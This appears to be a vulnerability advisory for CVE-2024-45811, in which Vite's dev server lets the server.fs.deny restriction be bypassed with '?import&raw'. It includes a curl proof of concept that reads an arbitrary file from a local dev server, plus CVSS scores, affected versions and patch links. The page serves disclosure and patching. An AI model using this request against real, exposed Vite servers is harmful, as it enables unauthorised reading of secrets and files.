CVE-2024-45811
MEDIUM5.3EPSS 0.01%Vite's `server.fs.deny` is bypassed when using `?import&raw`
Description
### Summary The contents of arbitrary files can be returned to the browser. ### Details `@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists. ### PoC ```sh $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev $ echo "top secret content" > /tmp/secret.txt # expected behaviour $ curl "http://localhost:5173/@fs/tmp/secret.txt" <body> <h1>403 Restricted</h1> <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list. # security bypassed $ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw" export default "top secret content\n" //# sourceMappingURL=data:application/json;base64,eyJ2... ```
Affected packages (1)
- npm/vite>= 5.4.0, < 5.4.6
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | MEDIUM5.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
References (8)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2024-45811
- PATCHhttps://github.com/vitejs/vite
- WEBhttps://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249
- WEBhttps://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34
- WEBhttps://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd
- WEBhttps://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6
- WEBhttps://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7
- WEBhttps://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx